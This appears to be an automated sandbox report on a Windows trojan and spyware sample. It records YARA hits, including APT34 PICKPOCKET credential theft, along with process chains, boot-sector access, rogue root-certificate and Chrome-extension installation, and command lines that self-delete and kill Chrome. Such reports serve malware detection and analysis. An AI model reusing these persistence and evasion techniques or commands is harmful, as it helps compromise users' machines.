Source: 00000015.00000002.831664649.00000000050E9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000019.00000002.654114181.0000000004750000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.641295174.00000000046E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000015.00000002.829571542.00000000046C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 21.2.1E1C360C582DF797.exe.46c0000.7.unpack, type: UNPACKEDPE | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.aliens.exe.46e0000.5.unpack, type: UNPACKEDPE | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.aliens.exe.10000000.6.unpack, type: UNPACKEDPE | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 25.2.1E1C360C582DF797.exe.4750000.5.unpack, type: UNPACKEDPE | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.aliens.exe.46e0000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 21.2.1E1C360C582DF797.exe.46c0000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 25.2.1E1C360C582DF797.exe.10000000.7.unpack, type: UNPACKEDPE | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 25.2.1E1C360C582DF797.exe.4750000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 21.2.1E1C360C582DF797.exe.10000000.11.unpack, type: UNPACKEDPE | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 21.2.1E1C360C582DF797.exe.5320000.10.unpack, type: UNPACKEDPE | Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 21.2.1E1C360C582DF797.exe.4e60000.9.unpack, type: UNPACKEDPE | Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 25.2.1E1C360C582DF797.exe.5230000.6.unpack, type: UNPACKEDPE | Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: classification engine | Classification label: mal100.bank.troj.spyw.evad.winEXE@31/50@223/4
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_01216E5E GetLastError,FormatMessageW,
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: 0_2_6E621870 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: 0_2_004024FB CoCreateInstance,
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: 0_2_6E6286A0 LoadResource,LockResource,SizeofResource,
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | File created: C:\Program Files (x86)\71eza90awf48
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\h1GodtbhC8.exe.log
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5724:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5364:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello002
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello001
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign__install_r3
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | File created: C:\Users\user\AppData\Local\Temp\nsqEF28.tmp
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Command line argument: sfxname
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Command line argument: sfxstime
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Command line argument: STARTDLG
Source: h1GodtbhC8.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\1607186572092.exe | System information queried: HandleInformation
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: 1E1C360C582DF797.exe, 00000015.00000002.832533027.00000000054EE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 1E1C360C582DF797.exe, 00000015.00000002.832533027.00000000054EE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 1E1C360C582DF797.exe, 00000015.00000002.832533027.00000000054EE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: 1E1C360C582DF797.exe, 00000015.00000002.832533027.00000000054EE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 1E1C360C582DF797.exe, 00000015.00000002.832533027.00000000054EE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 1E1C360C582DF797.exe, 00000015.00000002.832533027.00000000054EE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 1E1C360C582DF797.exe, 00000015.00000002.832533027.00000000054EE000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: h1GodtbhC8.exeVirustotal: Detection: 46%
Source: h1GodtbhC8.exeMetadefender: Detection: 16%
Source: h1GodtbhC8.exeReversingLabs: Detection: 64%
Source: 1E1C360C582DF797.exeString found in binary or memory: -StartTP
Source: C:\Users\user\Desktop\h1GodtbhC8.exeFile read: C:\Users\user\Desktop\h1GodtbhC8.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\h1GodtbhC8.exe 'C:\Users\user\Desktop\h1GodtbhC8.exe'
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe 'C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe' -s
Source: unknownProcess created: C:\Program Files (x86)\71eza90awf48\aliens.exe 'C:\Program Files (x86)\71eza90awf48\aliens.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 57A4014B45800FBE12583F3FC91E5DB8 C
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 0011 installp3
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 200 installp3
Source: unknownProcess created: C:\Users\user\AppData\Roaming\1607186572092.exe 'C:\Users\user\AppData\Roaming\1607186572092.exe' /sjson 'C:\Users\user\AppData\Roaming\1607186572092.txt'
Source: unknownProcess created: C:\Users\user\AppData\Roaming\1607186588295.exe 'C:\Users\user\AppData\Roaming\1607186588295.exe' /sjson 'C:\Users\user\AppData\Roaming\1607186588295.txt'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Program Files (x86)\71eza90awf48\aliens.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\h1GodtbhC8.exeProcess created: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe 'C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe' -s
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeProcess created: C:\Program Files (x86)\71eza90awf48\aliens.exe 'C:\Program Files (x86)\71eza90awf48\aliens.exe'
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeProcess created: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 0011 installp3
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeProcess created: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 200 installp3
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Program Files (x86)\71eza90awf48\aliens.exe'
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeProcess created: C:\Users\user\AppData\Roaming\1607186572092.exe 'C:\Users\user\AppData\Roaming\1607186572092.exe' /sjson 'C:\Users\user\AppData\Roaming\1607186572092.txt'
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeProcess created: C:\Users\user\AppData\Roaming\1607186588295.exe 'C:\Users\user\AppData\Roaming\1607186588295.exe' /sjson 'C:\Users\user\AppData\Roaming\1607186588295.txt'
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeProcess created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\h1GodtbhC8.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Install
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: h1GodtbhC8.exeStatic file information: File size 4671378 > 1048576
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeFile opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
Source: h1GodtbhC8.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: setup.exe, 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1607186572092.exe, 0000001C.00000002.546755980.000000000040F000.00000002.00020000.sdmp, 1607186588295.exe, 0000001D.00000002.580846767.000000000040F000.00000002.00020000.sdmp
Source: Binary string: C:\Users\Operations\Source\Workspaces\Sib\Sibl\SibClr\obj\Release\SibClr.pdb source: h1GodtbhC8.exe, 00000000.00000003.367160882.0000000000745000.00000004.00000001.sdmp
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: 1E1C360C582DF797.exe, 00000015.00000002.826855048.00000000026F6000.00000002.00020000.sdmp
Source: Binary string: C:\Users\Operations\Source\Workspaces\Sib\Sibl\Release\Sibuia.pdb} source: h1GodtbhC8.exe, 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp, Sibuia.dll.0.dr
Source: Binary string: C:\Users\Lenny\Documents\nsis-3.01-src\build\urelease\stub_zlib-x86-ansi\stub_zlib.pdb source: aliens.exe, 00000004.00000002.627075353.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 00000015.00000002.825159947.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 00000019.00000000.617074635.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe.4.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 00000024.00000002.639458414.0000000000BDC000.00000002.00020000.sdmp
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Operations\Source\Workspaces\Sib\Sibl\Release\Sibuia.pdb source: h1GodtbhC8.exe, 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp, Sibuia.dll.0.dr

Data Obfuscation:

Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Unpacked PE file: 25.2.1E1C360C582DF797.exe.4750000.5.unpack
Binary contains a suspicious time stamp
Source: initial sample | Static PE information: 0xBD323864 [Sat Aug 2 06:04:20 2070 UTC]
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | File created: C:\Program Files (x86)\71eza90awf48\__tmp_rar_sfx_access_check_5371765
Source: 1E1C360C582DF797.exe.4.dr | Static PE information: real checksum: 0xe6954 should be:
Source: h1GodtbhC8.exe | Static PE information: real checksum: 0x0 should be: 0x47db98
Source: aliens.exe.1.dr | Static PE information: real checksum: 0xe6954 should be:
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: 0_2_6E65F9A8 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_0122E0E4 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_0122EBA6 push ecx; ret
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_10010579 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: 21_2_026DF034 push E8026DF0h; iretd
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: 21_2_026E8680 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: 21_2_026E78B0 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: 21_2_026E78B0 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: 21_2_026E9FCF push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: 21_2_04E88D9A push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: 21_2_04E8EB91 push ecx; ret
Source: initial sample | Static PE information: section name: .text entropy: 6.82101260035
Source: initial sample | Static PE information: section name: .text entropy: 6.82101260035

Persistence and Installation Behavior:

Contains functionality to infect the boot sector
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Installs new ROOT certificates
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Blob
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | File created: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | File created: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\SibClr.dll
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | File created: C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\Sibuia.dll
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | File created: C:\ProgramData\sib\{7C999AAA-0000-487E-97BD-7619B45532F4}\SibClr.dll
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | File created: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | File created: C:\Program Files (x86)\71eza90awf48\aliens.exe
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | File created: C:\ProgramData\sib\{7C999AAA-0000-487E-97BD-7619B45532F4}\SibClr.dll
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\icon.png
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\icon48.png
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\popup.html
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\background.js
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\book.js
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\jquery-1.8.3.min.js
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\popup.js
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\codadfjafjohpbonogiakdokmmnfeaje\1.0.0.0_0\manifest.json
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: 21_2_04FABE50 _memset,SHGetSpecialFolderPathA,_strcat_s,PathFileExistsA,_memset,GetPrivateProfileStringA,_strlen,_strlen,PathRemoveFileSpecA,_strcat_s,_strcat_s,PathFileExistsA,PathFindFileNameA,

Boot Survival:

Contains functionality to infect the boot sector
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Windows\SysWOW64\msiexec.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Process information set: NOOPENFILEERRORBOX
